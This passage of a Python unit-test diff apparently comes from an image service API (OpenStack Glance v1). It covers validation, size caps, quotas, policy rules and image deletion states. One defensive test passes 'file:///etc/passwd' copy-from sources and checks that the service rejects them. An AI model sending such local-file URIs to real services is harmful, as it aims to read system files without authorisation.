container format' in res.body) + + def test_bad_container_format(self): + fixture_headers = { + 'x-image-meta-store': 'bad', + 'x-image-meta-name': 'bogus', + 'x-image-meta-location': 'http://localhost:0/image.tar.gz', + 'x-image-meta-disk-format': 'vhd', + 'x-image-meta-container-format': 'invalid', + } + + req = webob.Request.blank(""/images"") + req.method = 'POST' + for k, v in fixture_headers.iteritems(): + req.headers[k] = v + + res = req.get_response(self.api) + self.assertEquals(res.status_int, 400) + self.assertTrue('Invalid container format' in res.body) + + def test_bad_image_size(self): + fixture_headers = { + 'x-image-meta-store': 'bad', + 'x-image-meta-name': 'bogus', + 'x-image-meta-location': 'http://example.com/image.tar.gz', + 'x-image-meta-disk-format': 'vhd', + 'x-image-meta-size': 'invalid', + 'x-image-meta-container-format': 'bare', + } + + req = webob.Request.blank(""/images"") + req.method = 'POST' + for k, v in fixture_headers.iteritems(): + req.headers[k] = v + + res = req.get_response(self.api) + self.assertEquals(res.status_int, 400) + self.assertTrue('Incoming image size' in res.body) + + def test_bad_image_name(self): + fixture_headers = { + 'x-image-meta-store': 'bad', + 'x-image-meta-name': 'X' * 256, + 'x-image-meta-location': 'http://example.com/image.tar.gz', + 'x-image-meta-disk-format': 'vhd', + 'x-image-meta-container-format': 'bare', + } + + req = webob.Request.blank(""/images"") + req.method = 'POST' + for k, v in fixture_headers.iteritems(): + req.headers[k] = v + + res = req.get_response(self.api) + self.assertEquals(res.status_int, 400) + + def test_add_image_no_location_no_image_as_body(self): + """"""Tests creates a queued image for no body and no loc header"""""" + fixture_headers = {'x-image-meta-store': 'file', + 'x-image-meta-disk-format': 'vhd', + 'x-image-meta-container-format': 'ovf', + 'x-image-meta-name': 'fake image #3'} + + req = webob.Request.blank(""/images"") + req.method = 'POST' + for k, v in fixture_headers.iteritems(): + req.headers[k] = v + res = req.get_response(self.api) + self.assertEquals(res.status_int, 201) + + res_body = json.loads(res.body)['image'] + self.assertEquals('queued', res_body['status']) + image_id = res_body['id'] + + # Test that we are able to edit the Location field + # per LP Bug #911599 + + req = webob.Request.blank(""/images/%s"" % image_id) + req.method = 'PUT' + req.headers['x-image-meta-location'] = 'http://localhost:0/images/123' + res = req.get_response(self.api) + self.assertEquals(res.status_int, 200) + + res_body = json.loads(res.body)['image'] + # Once the location is set, the image should be activated + # see LP Bug #939484 + self.assertEquals('active', res_body['status']) + self.assertFalse('location' in res_body) # location never shown + + def test_add_image_no_location_no_content_type(self): + """"""Tests creates a queued image for no body and no loc header"""""" + fixture_headers = {'x-image-meta-store': 'file', + 'x-image-meta-disk-format': 'vhd', + 'x-image-meta-container-format': 'ovf', + 'x-image-meta-name': 'fake image #3'} + + req = webob.Request.blank(""/images"") + req.method = 'POST' + req.body = ""chunk00000remainder"" + for k, v in fixture_headers.iteritems(): + req.headers[k] = v + res = req.get_response(self.api) + self.assertEquals(res.status_int, 400) + + def test_add_image_size_header_too_big(self): + """"""Tests raises BadRequest for supplied image size that is too big"""""" + fixture_headers = {'x-image-meta-size': CONF.image_size_cap + 1, + 'x-image-meta-name': 'fake image #3'} + + req = webob.Request.blank(""/images"") + req.method = 'POST' + for k, v in fixture_headers.iteritems(): + req.headers[k] = v + + res = req.get_response(self.api) + self.assertEquals(res.status_int, 400) + + def test_add_image_size_chunked_data_too_big(self): + self.config(image_size_cap=512) + fixture_headers = { + 'x-image-meta-name': 'fake image #3', + 'x-image-meta-container_format': 'ami', + 'x-image-meta-disk_format': 'ami', + 'transfer-encoding': 'chunked', + 'content-type': 'application/octet-stream', + } + + req = webob.Request.blank(""/images"") + req.method = 'POST' + + req.body_file = StringIO.StringIO('X' * (CONF.image_size_cap + 1)) + for k, v in fixture_headers.iteritems(): + req.headers[k] = v + + res = req.get_response(self.api) + self.assertEquals(res.status_int, 413) + + def test_add_image_size_data_too_big(self): + self.config(image_size_cap=512) + fixture_headers = { + 'x-image-meta-name': 'fake image #3', + 'x-image-meta-container_format': 'ami', + 'x-image-meta-disk_format': 'ami', + 'content-type': 'application/octet-stream', + } + + req = webob.Request.blank(""/images"") + req.method = 'POST' + + req.body = 'X' * (CONF.image_size_cap + 1) + for k, v in fixture_headers.iteritems(): + req.headers[k] = v + + res = req.get_response(self.api) + self.assertEquals(res.status_int, 400) + + def test_add_image_size_header_exceed_quota(self): + quota = 500 + self.config(user_storage_quota=quota) + fixture_headers = {'x-image-meta-size': quota + 1, + 'x-image-meta-name': 'fake image #3', + 'x-image-meta-container_format': 'bare', + 'x-image-meta-disk_format': 'qcow2', + 'content-type': 'application/octet-stream', + } + + req = webob.Request.blank(""/images"") + req.method = 'POST' + for k, v in fixture_headers.iteritems(): + req.headers[k] = v + req.body = 'X' * (quota + 1) + res = req.get_response(self.api) + self.assertEquals(res.status_int, 413) + + def test_add_image_size_data_exceed_quota(self): + quota = 500 + self.config(user_storage_quota=quota) + fixture_headers = { + 'x-image-meta-name': 'fake image #3', + 'x-image-meta-container_format': 'bare', + 'x-image-meta-disk_format': 'qcow2', + 'content-type': 'application/octet-stream', + } + + req = webob.Request.blank(""/images"") + req.method = 'POST' + + req.body = 'X' * (quota + 1) + for k, v in fixture_headers.iteritems(): + req.headers[k] = v + + res = req.get_response(self.api) + self.assertEquals(res.status_int, 413) + + def test_add_image_size_data_exceed_quota_readd(self): + quota = 500 + self.config(user_storage_quota=quota) + fixture_headers = { + 'x-image-meta-name': 'fake image #3', + 'x-image-meta-container_format': 'bare', + 'x-image-meta-disk_format': 'qcow2', + 'content-type': 'application/octet-stream', + } + + req = webob.Request.blank(""/images"") + req.method = 'POST' + req.body = 'X' * (quota + 1) + for k, v in fixture_headers.iteritems(): + req.headers[k] = v + + res = req.get_response(self.api) + self.assertEquals(res.status_int, 413) + + used_size = sum([f['size'] for f in self.FIXTURES]) + + req = webob.Request.blank(""/images"") + req.method = 'POST' + req.body = 'X' * (quota - used_size) + for k, v in fixture_headers.iteritems(): + req.headers[k] = v + + res = req.get_response(self.api) + self.assertEquals(res.status_int, 201) + + def _add_check_no_url_info(self): + + fixture_headers = {'x-image-meta-disk-format': 'ami', + 'x-image-meta-container-format': 'ami', + 'x-image-meta-size': '0', + 'x-image-meta-name': 'empty image'} + + req = webob.Request.blank(""/images"") + req.method = 'POST' + for k, v in fixture_headers.iteritems(): + req.headers[k] = v + res = req.get_response(self.api) + res_body = json.loads(res.body)['image'] + self.assertFalse('locations' in res_body) + self.assertFalse('direct_url' in res_body) + image_id = res_body['id'] + + # HEAD empty image + req = webob.Request.blank(""/images/%s"" % image_id) + req.method = 'HEAD' + res = req.get_response(self.api) + self.assertEqual(res.status_int, 200) + self.assertFalse('x-image-meta-locations' in res.headers) + self.assertFalse('x-image-meta-direct_url' in res.headers) + + def test_add_check_no_url_info_ml(self): + self.config(show_multiple_locations=True) + self._add_check_no_url_info() + + def test_add_check_no_url_info_direct_url(self): + self.config(show_image_direct_url=True) + self._add_check_no_url_info() + + def test_add_check_no_url_info_both_on(self): + self.config(show_image_direct_url=True) + self.config(show_multiple_locations=True) + self._add_check_no_url_info() + + def test_add_check_no_url_info_both_off(self): + self._add_check_no_url_info() + + def test_add_image_zero_size(self): + """"""Tests creating an active image with explicitly zero size"""""" + fixture_headers = {'x-image-meta-disk-format': 'ami', + 'x-image-meta-container-format': 'ami', + 'x-image-meta-size': '0', + 'x-image-meta-name': 'empty image'} + + req = webob.Request.blank(""/images"") + req.method = 'POST' + for k, v in fixture_headers.iteritems(): + req.headers[k] = v + res = req.get_response(self.api) + self.assertEquals(res.status_int, 201) + + res_body = json.loads(res.body)['image'] + self.assertEquals('active', res_body['status']) + image_id = res_body['id'] + + # GET empty image + req = webob.Request.blank(""/images/%s"" % image_id) + res = req.get_response(self.api) + self.assertEqual(res.status_int, 200) + self.assertEqual(len(res.body), 0) + + def _do_test_add_image_attribute_mismatch(self, attributes): + fixture_headers = { + 'x-image-meta-name': 'fake image #3', + } + fixture_headers.update(attributes) + + req = webob.Request.blank(""/images"") + req.method = 'POST' + for k, v in fixture_headers.iteritems(): + req.headers[k] = v + + req.headers['Content-Type'] = 'application/octet-stream' + req.body = ""XXXX"" + res = req.get_response(self.api) + self.assertEquals(res.status_int, 400) + + def test_add_image_checksum_mismatch(self): + attributes = { + 'x-image-meta-checksum': 'asdf', + } + self._do_test_add_image_attribute_mismatch(attributes) + + def test_add_image_size_mismatch(self): + attributes = { + 'x-image-meta-size': str(len(""XXXX"") + 1), + } + self._do_test_add_image_attribute_mismatch(attributes) + + def test_add_image_checksum_and_size_mismatch(self): + attributes = { + 'x-image-meta-checksum': 'asdf', + 'x-image-meta-size': str(len(""XXXX"") + 1), + } + self._do_test_add_image_attribute_mismatch(attributes) + + def test_add_image_bad_store(self): + """"""Tests raises BadRequest for invalid store header"""""" + fixture_headers = {'x-image-meta-store': 'bad', + 'x-image-meta-name': 'fake image #3'} + + req = webob.Request.blank(""/images"") + req.method = 'POST' + for k, v in fixture_headers.iteritems(): + req.headers[k] = v + + req.headers['Content-Type'] = 'application/octet-stream' + req.body = ""chunk00000remainder"" + res = req.get_response(self.api) + self.assertEquals(res.status_int, 400) + + def test_add_image_basic_file_store(self): + """"""Tests to add a basic image in the file store"""""" + fixture_headers = {'x-image-meta-store': 'file', + 'x-image-meta-disk-format': 'vhd', + 'x-image-meta-container-format': 'ovf', + 'x-image-meta-name': 'fake image #3'} + + req = webob.Request.blank(""/images"") + req.method = 'POST' + for k, v in fixture_headers.iteritems(): + req.headers[k] = v + + req.headers['Content-Type'] = 'application/octet-stream' + req.body = ""chunk00000remainder"" + res = req.get_response(self.api) + self.assertEquals(res.status_int, 201) + + # Test that the Location: header is set to the URI to + # edit the newly-created image, as required by APP. + # See LP Bug #719825 + self.assertTrue('location' in res.headers, + ""'location' not in response headers.\n"" + ""res.headerlist = %r"" % res.headerlist) + res_body = json.loads(res.body)['image'] + self.assertTrue('/images/%s' % res_body['id'] + in res.headers['location']) + self.assertEquals('active', res_body['status']) + image_id = res_body['id'] + + # Test that we are NOT able to edit the Location field + # per LP Bug #911599 + + req = webob.Request.blank(""/images/%s"" % image_id) + req.method = 'PUT' + req.headers['x-image-meta-location'] = 'http://example.com/images/123' + res = req.get_response(self.api) + self.assertEquals(res.status_int, 400) + + def test_add_image_unauthorized(self): + rules = {""add_image"": '!'} + self.set_policy_rules(rules) + fixture_headers = {'x-image-meta-store': 'file', + 'x-image-meta-disk-format': 'vhd', + 'x-image-meta-container-format': 'ovf', + 'x-image-meta-name': 'fake image #3'} + + req = webob.Request.blank(""/images"") + req.method = 'POST' + for k, v in fixture_headers.iteritems(): + req.headers[k] = v + + req.headers['Content-Type'] = 'application/octet-stream' + req.body = ""chunk00000remainder"" + res = req.get_response(self.api) + self.assertEquals(res.status_int, 403) + + def test_add_publicize_image_unauthorized(self): + rules = {""add_image"": '@', ""modify_image"": '@', + ""publicize_image"": '!'} + self.set_policy_rules(rules) + fixture_headers = {'x-image-meta-store': 'file', + 'x-image-meta-is-public': 'true', + 'x-image-meta-disk-format': 'vhd', + 'x-image-meta-container-format': 'ovf', + 'x-image-meta-name': 'fake image #3'} + + req = webob.Request.blank(""/images"") + req.method = 'POST' + for k, v in fixture_headers.iteritems(): + req.headers[k] = v + + req.headers['Content-Type'] = 'application/octet-stream' + req.body = ""chunk00000remainder"" + res = req.get_response(self.api) + self.assertEquals(res.status_int, 403) + + def test_add_publicize_image_authorized(self): + rules = {""add_image"": '@', ""modify_image"": '@', + ""publicize_image"": '@'} + self.set_policy_rules(rules) + fixture_headers = {'x-image-meta-store': 'file', + 'x-image-meta-is-public': 'true', + 'x-image-meta-disk-format': 'vhd', + 'x-image-meta-container-format': 'ovf', + 'x-image-meta-name': 'fake image #3'} + + req = webob.Request.blank(""/images"") + req.method = 'POST' + for k, v in fixture_headers.iteritems(): + req.headers[k] = v + + req.headers['Content-Type'] = 'application/octet-stream' + req.body = ""chunk00000remainder"" + res = req.get_response(self.api) + self.assertEquals(res.status_int, 201) + + def test_add_copy_from_image_unauthorized(self): + rules = {""add_image"": '@', ""copy_from"": '!'} + self.set_policy_rules(rules) + fixture_headers = {'x-image-meta-store': 'file', + 'x-image-meta-disk-format': 'vhd', + 'x-glance-api-copy-from': 'http://glance.com/i.ovf', + 'x-image-meta-container-format': 'ovf', + 'x-image-meta-name': 'fake image #F'} + + req = webob.Request.blank(""/images"") + req.method = 'POST' + for k, v in fixture_headers.iteritems(): + req.headers[k] = v + + req.headers['Content-Type'] = 'application/octet-stream' + req.body = ""chunk00000remainder"" + res = req.get_response(self.api) + self.assertEquals(res.status_int, 403) + + def test_add_copy_from_image_authorized(self): + rules = {""add_image"": '@', ""copy_from"": '@'} + self.set_policy_rules(rules) + fixture_headers = {'x-image-meta-store': 'file', + 'x-image-meta-disk-format': 'vhd', + 'x-glance-api-copy-from': 'http://glance.com/i.ovf', + 'x-image-meta-container-format': 'ovf', + 'x-image-meta-name': 'fake image #F'} + + req = webob.Request.blank(""/images"") + req.method = 'POST' + for k, v in fixture_headers.iteritems(): + req.headers[k] = v + + req.headers['Content-Type'] = 'application/octet-stream' + res = req.get_response(self.api) + self.assertEquals(res.status_int, 201) + + def test_add_copy_from_with_nonempty_body(self): + """"""Tests creates an image from copy-from and nonempty body"""""" + fixture_headers = {'x-image-meta-store': 'file', + 'x-image-meta-disk-format': 'vhd', + 'x-glance-api-copy-from': 'http://a/b/c.ovf', + 'x-image-meta-container-format': 'ovf', + 'x-image-meta-name': 'fake image #F'} + + req = webob.Request.blank(""/images"") + req.headers['Content-Type'] = 'application/octet-stream' + req.method = 'POST' + req.body = ""chunk00000remainder"" + for k, v in fixture_headers.iteritems(): + req.headers[k] = v + res = req.get_response(self.api) + self.assertEquals(res.status_int, 400) + + def test_add_location_with_nonempty_body(self): + """"""Tests creates an image from location and nonempty body"""""" + fixture_headers = {'x-image-meta-store': 'file', + 'x-image-meta-disk-format': 'vhd', + 'x-image-meta-location': 'http://a/b/c.tar.gz', + 'x-image-meta-container-format': 'ovf', + 'x-image-meta-name': 'fake image #F'} + + req = webob.Request.blank(""/images"") + req.headers['Content-Type'] = 'application/octet-stream' + req.method = 'POST' + req.body = ""chunk00000remainder"" + for k, v in fixture_headers.iteritems(): + req.headers[k] = v + res = req.get_response(self.api) + self.assertEquals(res.status_int, 400) + + def test_add_location_with_conflict_image_size(self): + """"""Tests creates an image from location and conflict image size"""""" + + self.stubs.Set(glance.api.v1.images, 'get_size_from_backend', + lambda *args, **kwargs: 2) + + fixture_headers = {'x-image-meta-store': 'file', + 'x-image-meta-disk-format': 'vhd', + 'x-image-meta-location': 'http://a/b/c.tar.gz', + 'x-image-meta-container-format': 'ovf', + 'x-image-meta-name': 'fake image #F', + 'x-image-meta-size': '1'} + + req = webob.Request.blank(""/images"") + req.headers['Content-Type'] = 'application/octet-stream' + req.method = 'POST' + for k, v in fixture_headers.iteritems(): + req.headers[k] = v + res = req.get_response(self.api) + self.assertEquals(res.status_int, 409) + + def test_add_copy_from_with_location(self): + """"""Tests creates an image from copy-from and location"""""" + fixture_headers = {'x-image-meta-store': 'file', + 'x-image-meta-disk-format': 'vhd', + 'x-glance-api-copy-from': 'http://a/b/c.ovf', + 'x-image-meta-container-format': 'ovf', + 'x-image-meta-name': 'fake image #F', + 'x-image-meta-location': 'http://a/b/c.tar.gz'} + + req = webob.Request.blank(""/images"") + req.method = 'POST' + for k, v in fixture_headers.iteritems(): + req.headers[k] = v + res = req.get_response(self.api) + self.assertEquals(res.status_int, 400) + + def _do_test_post_image_content_missing_format(self, missing): + """"""Tests creation of an image with missing format"""""" + fixture_headers = {'x-image-meta-store': 'file', + 'x-image-meta-disk-format': 'vhd', + 'x-image-meta-container-format': 'ovf', + 'x-image-meta-name': 'fake image #3'} + + header = 'x-image-meta-' + missing.replace('_', '-') + + del fixture_headers[header] + + req = webob.Request.blank(""/images"") + req.method = 'POST' + for k, v in fixture_headers.iteritems(): + req.headers[k] = v + + req.headers['Content-Type'] = 'application/octet-stream' + req.body = ""chunk00000remainder"" + res = req.get_response(self.api) + self.assertEqual(res.status_int, 400) + + def test_add_copy_from_with_restricted_sources(self): + """"""Tests creates an image from copy-from with restricted sources"""""" + header_template = {'x-image-meta-store': 'file', + 'x-image-meta-disk-format': 'vhd', + 'x-image-meta-container-format': 'ovf', + 'x-image-meta-name': 'fake image #F'} + + schemas = [""file:///etc/passwd"", + ""swift+config:///xxx"", + ""filesystem:///etc/passwd""] + + for schema in schemas: + req = webob.Request.blank(""/images"") + req.method = 'POST' + for k, v in six.iteritems(header_template): + req.headers[k] = v + req.headers['x-glance-api-copy-from'] = schema + res = req.get_response(self.api) + self.assertEqual(400, res.status_int) + + def test_post_image_content_missing_disk_format(self): + """"""Tests creation of an image with missing disk format"""""" + self._do_test_post_image_content_missing_format('disk_format') + + def test_post_image_content_missing_container_type(self): + """"""Tests creation of an image with missing container format"""""" + self._do_test_post_image_content_missing_format('container_format') + + def _do_test_put_image_content_missing_format(self, missing): + """"""Tests delayed activation of an image with missing format"""""" + fixture_headers = {'x-image-meta-store': 'file', + 'x-image-meta-disk-format': 'vhd', + 'x-image-meta-container-format': 'ovf', + 'x-image-meta-name': 'fake image #3'} + + header = 'x-image-meta-' + missing.replace('_', '-') + + del fixture_headers[header] + + req = webob.Request.blank(""/images"") + req.method = 'POST' + for k, v in fixture_headers.iteritems(): + req.headers[k] = v + res = req.get_response(self.api) + self.assertEquals(res.status_int, 201) + + res_body = json.loads(res.body)['image'] + self.assertEquals('queued', res_body['status']) + image_id = res_body['id'] + + req = webob.Request.blank(""/images/%s"" % image_id) + req.method = 'PUT' + for k, v in fixture_headers.iteritems(): + req.headers[k] = v + req.headers['Content-Type'] = 'application/octet-stream' + req.body = ""chunk00000remainder"" + res = req.get_response(self.api) + self.assertEquals(res.status_int, 400) + + def test_put_image_content_missing_disk_format(self): + """"""Tests delayed activation of image with missing disk format"""""" + self._do_test_put_image_content_missing_format('disk_format') + + def test_put_image_content_missing_container_type(self): + """"""Tests delayed activation of image with missing container format"""""" + self._do_test_put_image_content_missing_format('container_format') + + def test_update_deleted_image(self): + """"""Tests that exception raised trying to update a deleted image"""""" + req = webob.Request.blank(""/images/%s"" % UUID2) + req.method = 'DELETE' + res = req.get_response(self.api) + self.assertEquals(res.status_int, 200) + + fixture = {'name': 'test_del_img'} + req = webob.Request.blank('/images/%s' % UUID2) + req.method = 'PUT' + req.content_type = 'application/json' + req.body = json.dumps(dict(image=fixture)) + + res = req.get_response(self.api) + self.assertEquals(res.status_int, 403) + self.assertTrue('Forbidden to update deleted image' in res.body) + + def test_delete_deleted_image(self): + """"""Tests that exception raised trying to delete a deleted image"""""" + req = webob.Request.blank(""/images/%s"" % UUID2) + req.method = 'DELETE' + res = req.get_response(self.api) + self.assertEquals(res.status_int, 200) + + # Verify the status is deleted + req = webob.Request.blank(""/images/%s"" % UUID2) + req.method = 'HEAD' + res = req.get_response(self.api) + self.assertEquals(res.status_int, 200) + self.assertEqual(""deleted"", res.headers['x-image-meta-status']) + + req = webob.Request.blank(""/images/%s"" % UUID2) + req.method = 'DELETE' + res = req.get_response(self.api) + self.assertEquals(res.status_int, 404) + msg = ""Image %s not found."" % UUID2 + self.assertTrue(msg in res.body) + + # Verify the status is still deleted + req = webob.Request.blank(""/images/%s"" % UUID2) + req.method = 'HEAD' + res = req.get_response(self.api) + self.assertEquals(res.status_int, 200) + self.assertEqual(""deleted"", res.headers['x-image-meta-status']) + + def test_delete_pending_delete_image(self): + """""" + Tests that correct response returned when deleting + a pending_delete image + """""" + # First deletion + self.config(delayed_delete=True, scrubber_datadir='/tmp/scrubber') + req = webob.Request.blank(""/images/%s"" % UUID2) + req.method = 'DELETE' + res = req.get_response(self.api) + self.assertEquals(res.status_int, 200) + + # Verify the status is pending_delete + req = webob.Request.blank(""/images/%s"" % UUID2) + req.method = 'HEAD' + res = req.get_response(self.api) + self.assertEquals(res.status_int, 200) + self.assertEqual(""pending_delete"", res.headers['x-image-meta-status']) + + # Second deletion + req = webob.Request.blank(""/images/%s"" % UUID2) + req.method = 'DELETE' + res = req.get_response(self.api) + self.assertEquals(res.status_int, 403) + self.assertTrue('Forbidden to delete a pending_delete image' + in res.body) + + # Verify the status is still pending_delete + req = webob.Request.blank(""/images/%s"" % UUID2) + req.method = 'HEAD' + res = req.get_response(self.api) + self.assertEquals(res.status_int, 200) + self.assertEqual(""pending_delete"", res.headers['x-image-meta-status']) + + def test_register_and_upload(self): + """""" + Test that the process of registering an image with + some metadata, then uploading an image file with some + more metadata doesn't mark the original metadata deleted + :see LP Bug#901534 + """""" + fixture_headers = {'x-image-meta-store': 'file', + 'x-image-meta-disk-format': 'vhd', + 'x-image-meta-container-format': 'ovf', + 'x-image-meta-name': 'fake image #3', + 'x-image-meta-property-key1': 'value1'} + + req = webob.Request.blank(""/images"") + req.method = 'POST' + for k, v in fixture_headers.iteritems(): + req.headers[k] = v + + res = req.get_response(self.api) + self.assertEquals(res.status_int, 201) + res_body = json.loads(res.body)['image'] + + self.assertTrue('id' in res_body) + + image_id = res_body['id'] + self.assertTrue('/images/%s' % image_id in res.headers['location']) + + # Verify the status is queued + self.assertTrue('status' in res_body) + self.assertEqual('queued', res_body['status']) + + # Check properties are not deleted + self.assertTrue('properties' in res_body) + self.assertTrue('key1' in res_body['properties']) + self.assertEqual('value1', res_body['properties']['key1']) + + # Now upload the image file along with some more + # metadata and verify original metadata properties + # are not marked deleted + req = webob.Request.blank(""/images/%s"" % image_id) + req.method = 'PUT' + req.headers['Content-Type'] = 'application/octet-stream' + req.headers['x-image-meta-property-key2'] = 'value2' + req.body = ""chunk00000remainder"" + res = req.get_response(self.api) + self.assertEquals(res.status_int, 200) + + # Verify the status is queued + req = webob.Request.blank(""/images/%s"" % image_id) + req.method = 'HEAD' + + res = req.get_response(self.api) + self.assertEquals(res.status_int, 200) + self.assertTrue('x-image-meta-property-key1' in res.headers, + ""Did not find required property in headers. "" + ""Got headers: %r"" % res.headers) + self.assertEqual(""active"", res.headers['x-image-meta-status']) + + def test_disable_purge_props(self): + """""" + Test the special x-glance-registry-purge-props header controls + the purge property behaviour of the registry. + :see LP Bug#901534 + """""" + fixture_headers = {'x-image-meta-store': 'file', + 'x-image-meta-disk-format': 'vhd', + 'x-image-meta-container-format': 'ovf', + 'x-image-meta-name': 'fake image #3', + 'x-image-meta-property-key1': 'value1'} + + req = webob.Request.blank(""/images"") + req.method = 'POST' + for k, v in fixture_headers.iteritems(): + req.headers[k] = v + + req.headers['Content-Type'] = 'application/octet-stream' + req.body = ""chunk00000remainder"" + res = req.get_response(self.api) + self.assertEquals(res.status_int, 201) + res_body = json.loads(res.body)['image'] + + self.assertTrue('id' in res_body) + + image_id = res_body['id'] + self.assertTrue('/images/%s' % image_id in res.headers['location']) + + # Verify the status is queued + self.assertTrue('status' in res_body) + self.assertEqual('active', res_body['status']) + + # Check properties are not deleted + self.assertTrue('properties' in res_body) + self.assertTrue('key1' in res_body['properties']) + self.assertEqual('value1', res_body['properties']['key1']) + + # Now update the image, setting new properties without + # passing the x-glance-registry-purge-props header and + # verify that original properties are marked deleted. + req = webob.Request.blank(""/images/%s"" % image_id) + req.method = 'PUT' + req.headers['x-image-meta-property-key2'] = 'value2' + res = req.get_response(self.api) + self.assertEquals(res.status_int, 200) + + # Verify the original property no longer in headers + req = webob.Request.blank(""/images/%s"" % image_id) + req.method = 'HEAD' + + res = req.get_response(self.api) + self.assertEquals(res.status_int, 200) + self.assertTrue('x-image-meta-property-key2' in res.headers, + ""Did not find required property in headers. "" + ""Got headers: %r"" % res.headers) + self.assertFalse('x-image-meta-property-key1' in res.headers, + ""Found property in headers that was not expected. "" + ""Got headers: %r"" % res.headers) + + # Now update the image, setting new properties and + # passing the x-glance-registry-purge-props header with + # a value of ""false"" and verify that second property + # still appears in headers. + req = webob.Request.blank(""/images/%s"" % image_id) + req.method = 'PUT' + req.headers['x-image-meta-property-key3'] = 'value3' + req.headers['x-glance-registry-purge-props'] = 'false' + res = req.get_response(self.api) + self.assertEquals(res.status_int, 200) + + # Verify the second and third property in headers + req = webob.Request.blank(""/images/%s"" % image_id) + req.method = 'HEAD' + + res = req.get_response(self.api) + self.assertEquals(res.status_int, 200) + self.assertTrue('x-image-meta-property-key2' in res.headers, + ""Did not find required property in headers. "" + ""Got headers: %r"" % res.headers) + self.assertTrue('x-image-meta-property-key3' in res.headers, + ""Did not find required property in headers. "" + ""Got headers: %r"" % res.headers) + + def test_publicize_image_unauthorized(self): + """"""Create a non-public image then fail to make public"""""" + rules = {""add_image"": '@', ""publicize_image"": '!'} + self.set_policy_rules(rules) + + fixture_headers = {'x-image-meta-store': 'file', + 'x-image-meta-disk-format': 'vhd', + 'x-image-meta-is-public': 'false', + 'x-image-meta-container-format': 'ovf', + 'x-image-meta-name': 'fake image #3'} + + req = webob.Request.blank(""/images"") + req.method = 'POST' + for k, v in fixture_headers.iteritems(): + req.headers[k] = v + res = req.get_response(self.api) + self.assertEquals(res.status_int, 201) + + res_body = json.loads(res.body)['image'] + req = webob.Request.blank(""/images/%s"" % res_body['id']) + req.method = 'PUT' + req.headers['x-image-meta-is-public'] = 'true' + res = req.get_response(self.api) + self.assertEquals(res.status_int, 403) + + def test_update_image_size_header_too_big(self): + """"""Tests raises BadRequest for supplied image size that is too big"""""" + fixture_headers = {'x-image-meta-size': CONF.image_size_cap + 1} + + req = webob.Request.blank(""/images/%s"" % UUID2) + req.method = 'PUT' + for k, v in fixture_headers.iteritems(): + req.headers[k] = v + + res = req.get_response(self.api) + self.assertEquals(res.status_int, 400) + + def test_update_image_size_data_too_big(self): + self.config(image_size_cap=512) + + fixture_headers = {'content-type': 'application/octet-stream'} + req = webob.Request.blank(""/images/%s"" % UUID2) + req.method = 'PUT' + + req.body = 'X' * (CONF.image_size_cap + 1) + for k, v in fixture_headers.iteritems(): + req.headers[k] = v + + res = req.get_response(self.api) + self.assertEquals(res.status_int, 400) + + def test_update_image_size_chunked_data_too_big(self): + self.config(image_size_cap=512) + + # Create new image that has no data + req = webob.Request.blank(""/images"") + req.method = 'POST' + req.headers['x-image-meta-name'] = 'something' + req.headers['x-image-meta-container_format'] = 'ami' + req.headers['x-image-meta-disk_format'] = 'ami' + res = req.get_response(self.api) + image_id = json.loads(res.body)['image']['id'] + + fixture_headers = { + 'content-type': 'application/octet-stream', + 'transfer-encoding': 'chunked', + } + req = webob.Request.blank(""/images/%s"" % image_id) + req.method = 'PUT' + + req.body_file = StringIO.StringIO('X' * (CONF.image_size_cap + 1)) + for k, v in fixture_headers.iteritems(): + req.headers[k] = v + + res = req.get_response(self.api) + self.assertEquals(res.status_int, 413) + + def test_update_non_existing_image(self): + self.config(image_size_cap=100) + + req = webob.Request.blank(""images/%s"" % _gen_uuid) + req.method = 'PUT' + req.body = 'test' + req.headers['x-image-meta-name'] = 'test' + req.headers['x-image-meta-container_format'] = 'ami' + req.headers['x-image-meta-disk_format'] = 'ami' + req.headers['x-image-meta-is_public'] = 'False' + res = req.get_response(self.api) + self.assertEqual(res.status_int, 404) + + def test_update_public_image(self): + fixture_headers = {'x-image-meta-store': 'file', + 'x-image-meta-disk-format': 'vhd', + 'x-image-meta-is-public': 'true', + 'x-image-meta-container-format': 'ovf', + 'x-image-meta-name': 'fake image #3'} + + req = webob.Request.blank(""/images"") + req.method = 'POST' + for k, v in fixture_headers.iteritems(): + req.headers[k] = v + res = req.get_response(self.api) + self.assertEquals(res.status_int, 201) + + res_body = json.loads(res.body)['image'] + req = webob.Request.blank(""/images/%s"" % res_body['id']) + req.method = 'PUT' + req.headers['x-image-meta-name'] = 'updated public image' + res = req.get_response(self.api) + self.assertEquals(res.status_int, 200) + + def test_get_index_sort_name_asc(self): + """""" + Tests that the /images registry API returns list of + public images sorted alphabetically by name in + ascending order. + """""" + UUID3 = _gen_uuid() + extra_fixture = {'id': UUID3, + 'status': 'active', + 'is_public': True, + 'disk_format': 'vhd', + 'container_format': 'ovf', + 'name': 'asdf', + 'size': 19, + 'checksum': None} + + db_api.image_create(self.context, extra_fixture) + + UUID4 = _gen_uuid() + extra_fixture = {'id': UUID4, + 'status': 'active', + 'is_public': True, + 'disk_format': 'vhd', + 'container_format': 'ovf', + 'name': 'xyz', + 'size': 20, + 'checksum': None} + + db_api.image_create(self.context, extra_fixture) + + req = webob.Request.blank('/images?sort_key=name&sort_dir=asc') + res = req.get_response(self.api) + self.assertEquals(res.status_int, 200) + res_dict = json.loads(res.body) + + images = res_dict['images'] + self.assertEquals(len(images), 3) + self.assertEquals(images[0]['id'], UUID3) + self.assertEquals(images[1]['id'], UUID2) + self.assertEquals(images[2]['id'], UUID4) + + def test_get_details_filter_changes_since(self): + """""" + Tests that the /images/detail registry API returns list of + public images that have a size less than or equal to size_max + """""" + dt1 = timeutils.utcnow() - datetime.timedelta(1) + iso1 = timeutils.isotime(dt1) + + date_only1 = dt1.strftime('%Y-%m-%d') + date_only2 = dt1.strftime('%Y%m%d') + date_only3 = dt1.strftime('%Y-%m%d') + + dt2 = timeutils.utcnow() + datetime.timedelta(1) + iso2 = timeutils.isotime(dt2) + + image_ts = timeutils.utcnow() + datetime.timedelta(2) + hour_before = image_ts.strftime('%Y-%m-%dT%H:%M:%S%%2B01:00') + hour_after = image_ts.strftime('%Y-%m-%dT%H:%M:%S-01:00') + + dt4 = timeutils.utcnow() + datetime.timedelta(3) + iso4 = timeutils.isotime(dt4) + + UUID3 = _gen_uuid() + extra_fixture = {'id': UUID3, + 'status': 'active', + 'is_public': True, + 'disk_format': 'vhd', + 'container_format': 'ovf', + 'name': 'fake image #3', + 'size': 18, + 'checksum': None} + + db_api.image_create(self.context, extra_fixture) + db_api.image_destroy(self.context, UUID3) + + UUID4 = _gen_uuid() + extra_fixture = {'id': UUID4, + 'status': 